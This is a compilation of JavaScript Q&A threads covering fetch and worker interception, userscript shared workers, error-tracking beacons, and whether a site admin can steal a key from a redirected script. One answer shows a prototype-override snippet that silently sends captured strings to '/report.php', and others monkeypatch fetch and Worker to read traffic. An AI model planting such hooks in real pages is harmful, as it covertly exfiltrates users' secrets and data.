How to get the resource initator like chrome-dev-tools? - javascript

I am making a javascript tracker using CefSharp.
While searching for a lot of solution, I could use a service worker to implement code like this that hijacking http/https requests, but it didn't work:
navigator.serviceWorker.addEventListener('fetch', event => {
event.respondWith(async function(e) {
var err = new Error();
ccw.hhh(err.stack); // print call-stack info using my own js-object
}());
});
Since I didn't create own web pages, so couldn't use code like navigator.serviceWorker.register('sw.js').
And also https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Intercept_HTTP_requests is not working on CefSharp.
And IResourceHandler::Open(IRequest ...) IRequest provided by CefSharp not contains callstack and initator informations.
How can I get to the requests call stack informations in CefSharp?

Related

Chrome Extension: Modifying a built in function for all webworkers

So here's a bit of background. I need to intercept the return data from a fetch request. I already know how to do that. By injecting this code in the webpage I can read the response body of a fetch. Like this:
var proxyFetch = fetch;
window.fetch = async function () {
var response = proxyFetch(...arguments);
// a lot of other code as well
return response;
}
The problem I'm having is that I can't modify the fetch function for any web workers. I don't have access to their 'this' context. My best bet is something to do with WorkerGlobalScope but I don't know if that object can do what I want.
My second idea was to do something like before the page loads.
window.Worker = class extends window.Worker{
constructor(){
// Take the url they passed into webworker.
// Fetch the url to get the raw javascript.
// Append my javascript to it.
// Turn it into a blob url
// Now I have my javascript running in every web worker
//
// The problem here is that we are not allowed to use asynchronous calls in the constructor.
// I am stumped on this option as well.
}
}
I've looked into WebRequest but they don't allow us to look at the response body of network requests.
I played around with this a lot to see if I could modify the globalThis or WorkerGlobalScope for every webworker on the page so I can modify the fetch but I could not find a way.
var code = "postMessage('hello world');"
var blob = new Blob([code], { type: 'application/javascript' });
var url = URL.createObjectURL(blob);
var worker = new Worker(url);
worker.onmessage = function(e) {
console.log(e.data);
};
What you are trying to achieve is mean to be done by a Service Worker.
They work as proxy between the app and server. You can control whether the request is even made or what it returns.
Additionally you can send messages between your worker and the service worker with the postMessage interface.

Apify web scraper task not stable. Getting different results between runs minutes apart

I'm building a very simple scraper to get the 'now playing' info from an online radio station I like to listen too.
It's stored in a simple p element on their site:
data html location
Now using the standard apify/web-scraper I run into a strange issue. The scraping sometimes works, but sometimes doesn't using this code:
async function pageFunction(context) {
const { request, log, jQuery } = context;
const $ = jQuery;
const nowPlaying = $('p.js-playing-now').text();
return {
nowPlaying
};
}
If the scraper works I get this result:
[{"nowPlaying": "Hangover Hotline - hosted by Lamebrane"}]
But if it doesn't I get this:
[{"nowPlaying": ""}]
And there is only a 5 minute difference between the two scrapes. The website doesn't change, the data is always presented in the same way. I tried checking all the boxes to circumvent security and different mixes of options (Use Chrome, Use Stealth, Ignore SSL errors, Ignore CORS and CSP) but that doesn't seem to fix it unfortunately.
Scraping instable
Any suggestions on how I can get this scraping task to constantly return the data I need?
It would be great if you can attach the URL, it will help me to find out the problem.
With the information you provided, I guess that the data you want to are loaded asynchronously. You can use context.waitFor() function.
async function pageFunction(context) {
const { request, log, jQuery } = context;
const $ = jQuery;
await context.waitFor(() => !!$('p.js-playing-now').text());
const nowPlaying = $('p.js-playing-now').text();
return {
nowPlaying
};
}
You can pass the function to wait, and I will wait until the result of the function will be true. You can check the doc.

How can I load a shared web worker with a user-script?

I want to load a shared worker with a user-script. The problem is the user-script is free, and has no business model for hosting a file - nor would I want to use a server, even a free one, to host one tiny file. Regardless, I tried it and I (of course) get a same origin policy error:
Uncaught SecurityError: Failed to construct 'SharedWorker': Script at
'https://cdn.rawgit.com/viziionary/Nacho-Bot/master/webworker.js'
cannot be accessed from origin 'http://stackoverflow.com'.
There's another way to load a web worker by converting the worker function to a string and then into a Blob and loading that as the worker but I tried that too:
var sharedWorkers = {};
var startSharedWorker = function(workerFunc){
var funcString = workerFunc.toString();
var index = funcString.indexOf('{');
var funcStringClean = funcString.substring(index + 1, funcString.length - 1);
var blob = new Blob([funcStringClean], { type: "text/javascript" });
sharedWorkers.google = new SharedWorker(window.URL.createObjectURL(blob));
sharedWorkers.google.port.start();
};
And that doesn't work either. Why? Because shared workers are shared based on the location their worker file is loaded from. Since createObjectURL generates a unique file name for each use, the workers will never have the same URL and will therefore never be shared.
How can I solve this problem?
Note: I tried asking about specific solutions, but at this point I think
the best I can do is ask in a more broad manner for any
solution to the problem, since all of my attempted solutions seem
fundamentally impossible due to same origin policies or the way
URL.createObjectURL works (from the specs, it seems impossible to
alter the resulting file URL).
That being said, if my question can somehow be improved or clarified, please leave a comment.
You can use fetch(), response.blob() to create an Blob URL of type application/javascript from returned Blob; set SharedWorker() parameter to Blob URL created by URL.createObjectURL(); utilize window.open(), load event of newly opened window to define same SharedWorker previously defined at original window, attach message event to original SharedWorker at newly opened windows.
javascript was tried at console at How to clear the contents of an iFrame from another iFrame, where current Question URL should be loaded at new tab with message from opening window through worker.port.postMessage() event handler logged at console.
Opening window should also log message event when posted from newly opened window using worker.postMessage(/* message */), similarly at opening window
window.worker = void 0, window.so = void 0;
fetch("https://cdn.rawgit.com/viziionary/Nacho-Bot/master/webworker.js")
.then(response => response.blob())
.then(script => {
console.log(script);
var url = URL.createObjectURL(script);
window.worker = new SharedWorker(url);
console.log(worker);
worker.port.addEventListener("message", (e) => console.log(e.data));
worker.port.start();
window.so = window.open("https://stackoverflow.com/questions/"
+ "38810002/"
+ "how-can-i-load-a-shared-web-worker-"
+ "with-a-user-script", "_blank");
so.addEventListener("load", () => {
so.worker = worker;
so.console.log(so.worker);
so.worker.port.addEventListener("message", (e) => so.console.log(e.data));
so.worker.port.start();
so.worker.port.postMessage("hi from " + so.location.href);
});
so.addEventListener("load", () => {
worker.port.postMessage("hello from " + location.href)
})
});
At console at either tab you can then use, e.g.; at How to clear the contents of an iFrame from another iFrame worker.postMessage("hello, again") at new window of current URL How can I load a shared web worker with a user-script?, worker.port.postMessage("hi, again"); where message events attached at each window, communication between the two windows can be achieved using original SharedWorker created at initial URL.
Precondition
As you've researched and as it has been mentioned in comments,
SharedWorker's URL is subject to the Same Origin Policy.
According to this question there's no CORS support for Worker's URL.
According to this issue GM_worker support is now a WONT_FIX, and
seems close enough to impossible to implement due to changes in Firefox.
There's also a note that sandboxed Worker (as opposed to
unsafeWindow.Worker) doesn't work either.
Design
What I suppose you want to achieve is a #include * userscript that will collect some statistics or create some global UI what will appear everywhere. And thus you want to have a worker to maintain some state or statistic aggregates in runtime (which will be easy to access from every instance of user-script), and/or you want to do some computation-heavy routine (because otherwise it will slow target sites down).
In the way of any solution
The solution I want to propose is to replace SharedWorker design with an alternative.
If you want just to maintain a state in the shared worker, just use Greasemonkey storage (GM_setValue and friends). It's shared among all userscript instances (SQLite behide the scenes).
If you want to do something computation-heavy task, to it in unsafeWindow.Worker and put result back in Greasemonkey storage.
If you want to do some background computation and it must be run only by single instance, there are number of "inter-window" synchronisation libraries (mostly they use localStorage but Greasemomkey's has the same API, so it shouldn't be hard to write an adapter to it). Thus you can acquire a lock in one userscript instance and run your routines in it. Like, IWC or ByTheWay (likely used here on Stack Exchange; post about it).
Other way
I'm not sure but there may be some ingenious response spoofing, made from ServiceWorker to make SharedWorker work as you would like to. Starting point is in this answer's edit.
I am pretty sure you want a different answer, but sadly this is what it boils down to.
Browsers implement same-origin-policies to protect internet users, and although your intentions are clean, no legit browser allows you to change the origin of a sharedWorker.
All browsing contexts in a sharedWorker must share the exact same origin
host
protocol
port
You cannot hack around this issue, I've trying using iframes in addition to your methods, but non will work.
Maybe you can put it your javascript file on github and use their raw. service to get the file, this way you can have it running without much efforts.
Update
I was reading chrome updates and I remembered you asking about this.
Cross-origin service workers arrived on chrome!
To do this, add the following to the install event for the SW:
self.addEventListener('install', event => {
event.registerForeignFetch({
scopes: [self.registration.scope], // or some sub-scope
origins: ['*'] // or ['https://example.com']
});
});
Some other considerations are needed aswell, check it out:
Full link: https://developers.google.com/web/updates/2016/09/foreign-fetch?hl=en?utm_campaign=devshow_series_crossoriginserviceworkers_092316&utm_source=gdev&utm_medium=yt-desc
Yes you can! (here's how):
I don't know if it's because something has changed in the four years since this question was asked, but it is entirely possible to do exactly what the question is asking for. It's not even particularly difficult. The trick is to initialize the shared worker from a data-url that contains its code directly, rather than from a createObjectURL(blob).
This is probably most easily demonstrated by example, so here's a little userscript for stackoverflow.com that uses a shared worker to assign each stackoverflow window a unique ID number, displayed in the tab title. Note that the shared-worker code is directly included as a template string (i.e. between backtick quotes):
// ==UserScript==
// #name stackoverflow userscript shared worker example
// #namespace stackoverflow test code
// #version 1.0
// #description Demonstrate the use of shared workers created in userscript
// #icon https://stackoverflow.com/favicon.ico
// #include http*://stackoverflow.com/*
// #run-at document-start
// ==/UserScript==
(function() {
"use strict";
var port = (new SharedWorker('data:text/javascript;base64,' + btoa(
// =======================================================================================================================
// ================================================= shared worker code: =================================================
// =======================================================================================================================
// This very simple shared worker merely provides each window with a unique ID number, to be displayed in the title
`
var lastID = 0;
onconnect = function(e)
{
var port = e.source;
port.onmessage = handleMessage;
port.postMessage(["setID",++lastID]);
}
function handleMessage(e) { console.log("Message Recieved by shared worker: ",e.data); }
`
// =======================================================================================================================
// =======================================================================================================================
))).port;
port.onmessage = function(e)
{
var data = e.data, msg = data[0];
switch (msg)
{
case "setID": document.title = "#"+data[1]+": "+document.title; break;
}
}
})();
I can confirm that this is working on FireFox v79 + Tampermonkey v4.11.6117.
There are a few minor caveats:
Firstly, it might be that the page your userscript is targeting is served with a Content-Security-Policy header that explicitly restricts the sources for scripts or worker scripts (script-src or worker-src policies). In that case, the data-url with your script's content will probably be blocked, and OTOH I can't think of a way around that, unless some future GM_ function gets added to allow a userscript to override a page's CSP or change its HTTP headers, or unless the user runs their browser with an extension or browser settings to disable CSP (see e.g. Disable same origin policy in Chrome).
Secondly, userscripts can be defined to run on multiple domains, e.g. you might run the same userscript on https://amazon.com and https://amazon.co.uk. But even when created by this single userscript, shared workers obey the same-origin policy, so there should be a different instance of the shared worker that gets created for all the .com windows vs for all the .co.uk windows. Be aware of this!
Finally, some browsers may impose a size limit on how long data-urls can be, restricting the maximum length of code for the shared worker. Even if not restricted, the conversion of all the code for long, complicated shared worker to base64 and back on every window load is quite inefficient. As is the indexing of shared workers by extremely long URLs (since you connect to an existing shared worker based on matching its exact URL). So what you can do is (a) start with an initially very minimal shared worker, then use eval() to add the real (potentially much longer) code to it, in response to something like an "InitWorkerRequired" message passed to the first window that opens the worker, and (b) For added efficiency, pre-calculate the base-64 string containing the initial minimal shared-worker bootstrap code.
Here's a modified version of the above example with these two wrinkles added in (also tested and confirmed to work), that runs on both stackoverflow.com and en.wikipedia.org (just so you can verify that the different domains do indeed use separate shared worker instances):
// ==UserScript==
// #name stackoverflow & wikipedia userscript shared worker example
// #namespace stackoverflow test code
// #version 2.0
// #description Demonstrate the use of shared workers created in userscript, with code injection after creation
// #icon https://stackoverflow.com/favicon.ico
// #include http*://stackoverflow.com/*
// #include http*://en.wikipedia.org/*
// #run-at document-end
// ==/UserScript==
(function() {
"use strict";
// Minimal bootstrap code used to first create a shared worker (commented out because we actually use a pre-encoded base64 string created from a minified version of this code):
/*
// ==================================================================================================================================
{
let x = [];
onconnect = function(e)
{
var p = e.source;
x.push(e);
p.postMessage(["InitWorkerRequired"]);
p.onmessage = function(e) // Expects only 1 kind of message: the init code. So we don't actually check for any other sort of message, and page script therefore mustn't send any other sort of message until init has been confirmed.
{
(0,eval)(e.data[1]); // (0,eval) is an indirect call to eval(), which therefore executes in global scope (rather than the scope of this function). See http://perfectionkills.com/global-eval-what-are-the-options/ or https://stackoverflow.com/questions/19357978/indirect-eval-call-in-strict-mode
while(e = x.shift()) onconnect(e); // This calls the NEW onconnect function, that the eval() above just (re-)defined. Note that unless windows are opened in very quick succession, x should only have one entry.
}
}
}
// ==================================================================================================================================
*/
// Actual code that we want the shared worker to execute. Can be as long as we like!
// Note that it must replace the onconnect handler defined by the minimal bootstrap worker code.
var workerCode =
// ==================================================================================================================================
`
"use strict"; // NOTE: because this code is evaluated by eval(), the presence of "use strict"; here will cause it to be evaluated in it's own scope just below the global scope, instead of in the global scope directly. Practically this shouldn't matter, though: it's rather like enclosing the whole code in (function(){...})();
var lastID = 0;
onconnect = function(e) // MUST set onconnect here; bootstrap method relies on this!
{
var port = e.source;
port.onmessage = handleMessage;
port.postMessage(["WorkerConnected",++lastID]); // As well as providing a page with it's ID, the "WorkerConnected" message indicates to a page that the worker has been initialized, so it may be posted messages other than "InitializeWorkerCode"
}
function handleMessage(e)
{
var data = e.data;
if (data[0]==="InitializeWorkerCode") return; // If two (or more) windows are opened very quickly, "InitWorkerRequired" may get posted to BOTH, and the second response will then arrive at an already-initialized worker, so must check for and ignore it here.
// ...
console.log("Message Received by shared worker: ",e.data); // For this simple example worker, there's actually nothing to do here
}
`;
// ==================================================================================================================================
// Use a base64 string encoding minified version of the minimal bootstrap code in the comments above, i.e.
// btoa('{let x=[];onconnect=function(e){var p=e.source;x.push(e);p.postMessage(["InitWorkerRequired"]);p.onmessage=function(e){(0,eval)(e.data[1]);while(e=x.shift()) onconnect(e);}}}');
// NOTE: If there's any chance the page might be using more than one shared worker based on this "bootstrap" method, insert a comment with some identification or name for the worker into the minified, base64 code, so that different shared workers get unique data-URLs (and hence don't incorrectly share worker instances).
var port = (new SharedWorker('data:text/javascript;base64,e2xldCB4PVtdO29uY29ubmVjdD1mdW5jdGlvbihlKXt2YXIgcD1lLnNvdXJjZTt4LnB1c2goZSk7cC5wb3N0TWVzc2FnZShbIkluaXRXb3JrZXJSZXF1aXJlZCJdKTtwLm9ubWVzc2FnZT1mdW5jdGlvbihlKXsoMCxldmFsKShlLmRhdGFbMV0pO3doaWxlKGU9eC5zaGlmdCgpKSBvbmNvbm5lY3QoZSk7fX19')).port;
port.onmessage = function(e)
{
var data = e.data, msg = data[0];
switch (msg)
{
case "WorkerConnected": document.title = "#"+data[1]+": "+document.title; break;
case "InitWorkerRequired": port.postMessage(["InitializeWorkerCode",workerCode]); break;
}
}
})();

How do we track Javascript errors? Do the existing tools actually work?

Today I find the need to track and retrieve a Javascript error stacktrace to solve them.
Today we were able to capture all rest calls, the idea is that once you get an error, automatically posts the stacktrace of that error plus the responses of the rest saved services so we can detect, reproduce, and solve the problems in almost an identical environment/situation.
As a requirement we were asked to make a module that can be included without being intrusive, for example:
Include the module that contains the hook logic in one JS, would be not invasive, include several lines of code in various JS files would be invasive.
The goal is to make a tool that can be included in a system already developed and track error events (like console).
I've read about this trackers logic:
errorception.com/
trackjs.com/
atatus.com/
airbrake.io/
jslogger.com/
getsentry.com/
muscula.com/
debuggify.net/
raygun.io/home
We need to do something like that, track the error and send it to our server.
As "Dagg Nabbit" says... "It's difficult to get a stack trace from errors that happen "in the wild" right now"...
So, we got a lot of paid products, but how did they really works?
In Airbrake they use stacktrace and window.onerror:
window.onerror = function(message, file, line) {
setTimeout(function() {
Hoptoad.notify({
message : message,
stack : '()#' + file + ':' + line
});
}, 100);
return true;
};
But i cant figure out when the stacktrace really used.
At some point, stacktrace, raven.js and other trackers need try / catch.
what happens if we found a way to make a global wrapper?
Can we just call stacktrace and wait for the catch?
How can I send a stack trace to my server when an unexpected error occurs on the client? Any advice or good practices?
It's difficult to get a stack trace from errors that happen "in the wild" right now, because the Error object isn't available to window.onerror.
window.onerror = function(message, file, line) { }
There is also a new error event, but this event doesn't expose the Error object (yet).
window.addEventListener('error', function(errorEvent) { })
Soon, window.onerror will get a fifth parameter containing the Error object, and you can probably use stacktrace.js to grab a stack trace during window.onerror.
<script src="stacktrace.js"></script>
<script>
window.onerror = function(message, file, line, column, error) {
try {
var trace = printStackTrace({e: error}).join('\n');
var url = 'http://yourserver.com/?jserror=' + encodeURIComponent(trace);
var p = new printStackTrace.implementation();
var xhr = p.createXMLHTTPObject();
xhr.open('GET', url, true);
xhr.send(null);
} catch (e) { }
}
</script>
At some point the Error API will probably be standardized, but for now, each implementation is different, so it's probably smart to use something like stacktracejs to grab the stack trace, since doing so requires a separate code path for each browser.
I'm the cofounder of TrackJS, mentioned above. You are correct, sometimes getting the stack traces requires a little bit of work. At some level, async functions have to be wrapped in a try/catch block--but we do this automatically!
In TrackJS 2.0+, any function you pass into a callback (addEventListener, setTimeout, etc) will be automatically wrapped in a try/catch. We've found that we can catch nearly everything with this.
For the few things that we might now, you can always try/catch it yourself. We provide some helpful wrappers to help, for example:
function foo() {
// does stuff that might blow up
}
trackJs.watch(foo);
In latest browsers, there is a 5th parameter for error object in window.onerror.
In addEventListener, you can get error object by event.error
// Only Chrome & Opera pass the error object.
window.onerror = function (message, file, line, col, error) {
console.log(message, "from", error.stack);
// You can send data to your server
// sendData(data);
};
// Only Chrome & Opera have an error attribute on the event.
window.addEventListener("error", function (event) {
console.log(e.error.message, "from", event.error.stack);
// You can send data to your server
// sendData(data);
})
You can send data using image tag as follows
function sendData(data) {
var img = newImage(),
src = http://yourserver.com/jserror + '&data=' + encodeURIComponent(JSON.stringify(data));
img.crossOrigin = 'anonymous';
img.onload = function success() {
console.log('success', data);
};
img.onerror = img.onabort = function failure() {
console.error('failure', data);
};
img.src = src;
}
If you are looking for opensource, then you can checkout TraceKit. TraceKit squeezes out as much useful information as possible and normalizes it. You can register a subscriber for error reports:
TraceKit.report.subscribe(function yourLogger(errorReport) {
// sendData(data);
});
However you have to do backend to collect the data and front-end to visualize the data.
Disclaimer: I am a web developer at https://www.atatus.com/ where you can track all your JavaScript errors and filter errors across various dimensions such as browsers, users, urls, tags etc.
#Da3 You asked about appenlight and stacktraces. Yes it can gather full stacktraces as long as you wrap the exception in try/catch block. Otherwise it will try reading the info from window.onerror which is very limited. This is a browser limitation (which may be fixed in future).

Is it possible for the admin to get the full sourcecode of my js-file if I redirect a Javascript file to a local modified Javascript file?

I created a google-chrome-extension which redirects all requests of a javascript-file on a website to a modified version of this file which is on my harddrive.
It works and I do it simplified like this:
... redirectUrl: chrome.extension.getURL("modified.js") ...
Modified.js is the same javascript file except that I modified a line in the code.
I changed something that looks like
var message = mytext.value;
to var message = aes.encrypt(mytext.value,"mysecretkey");
My question is now is it possible for the admin of this website where I redirect the javascript-file to modify his webpage that he can obtain "mysecretkey". (The admin knows how my extension works and which line is modified but doesn't know the used key)
Thanks in advance
Yes, the "admin" can read the source code of your code.
Your method is very insecure. There are two ways to read "mysecretkey".
Let's start with the non-trivial one: Get a reference to the source. Examples, assume that your aes.encrypt method looks like this:
(function() {
var aes = {encrypt: function(val, key) {
if (key.indexOf('whatever')) {/* ... */}
}};
})();
Then it can be compromised using:
(function(indexOf) {
String.prototype.indexOf = function(term) {
if (term !== 'known') (new Image).src = '/report.php?t=' + term;
return indexOf.apply(this, arguments);
};
})(String.prototype.indexOf);
Many prototype methods result in possible leaking, as well as arguments.callee. If the "admin" wants to break your code, he'll surely be able to achieve this.
The other method is much easier to implement:
var x = new XMLHttpRequest();
x.open('GET', '/possiblymodified.js');
x.onload = function() {
console.log(x.responseText); // Full source code here....
};
x.send();
You could replace the XMLHttpRequest method, but at this point, you're just playing the cat and mouse game. Whenever you think that you've secured your code, the other will find a way to break it (for instance, using the first described method).
Since the admin can control any aspect of the site, they could easily modify aes.encrypt to post the second argument to them and then continue as normal. Therefore your secret key would be immediately revealed.
No. The Web administrator would have no way of seeing what you set it to before it could get sent to the server where he could see it.

Categories

Resources